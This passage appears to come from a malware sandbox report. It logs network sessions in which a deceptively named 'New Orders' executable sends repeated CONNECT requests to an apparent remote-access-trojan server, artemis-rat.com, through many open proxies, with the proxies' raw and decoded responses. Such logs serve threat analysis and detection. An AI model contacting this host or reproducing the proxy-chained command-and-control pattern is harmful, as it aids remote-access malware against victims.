61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        244192.168.2.950703104.19.225.70807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.618174076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.772778034 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        245192.168.2.949889184.178.172.1441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.621315002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        246192.168.2.95053391.233.223.14731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.623790979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.382479906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.963984966 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        247192.168.2.950572185.132.242.21280837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.625313997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        248192.168.2.950670162.243.102.20797647672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.644035101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        249192.168.2.95062258.234.116.19780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.644499063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.997603893 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        250192.168.2.950602202.179.184.4454307672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.648155928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        251192.168.2.95067472.10.160.170315717672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.648274899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        252192.168.2.95067272.10.160.90291977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.648581028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        253192.168.2.95060427.0.234.20610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.650688887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        254192.168.2.9498521.194.236.22950057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.659342051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664648056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687969923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.489037037 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        255192.168.2.950704198.23.229.203156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.661894083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        256192.168.2.950735104.22.50.220807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.684892893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.839313030 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        257192.168.2.95063094.154.152.480797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.684948921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.382424116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.366862059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.477150917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477631092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.460956097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.476500034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.476295948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.273353100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        258192.168.2.950701194.4.50.91123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.685031891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        259192.168.2.950628103.189.249.19611117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.685354948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.032118082 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        260192.168.2.950746172.67.127.188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.685405970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.839494944 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        261192.168.2.95061141.77.188.131807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.701345921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.783432961 CET908INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Apache
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Length: 597
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>
                                                                                        Mar 11, 2024 16:16:44.084779978 CET908INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Apache
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Length: 597
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        262192.168.2.950756172.67.182.107807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.702513933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.856759071 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        263192.168.2.949985132.148.245.169381177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.704878092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
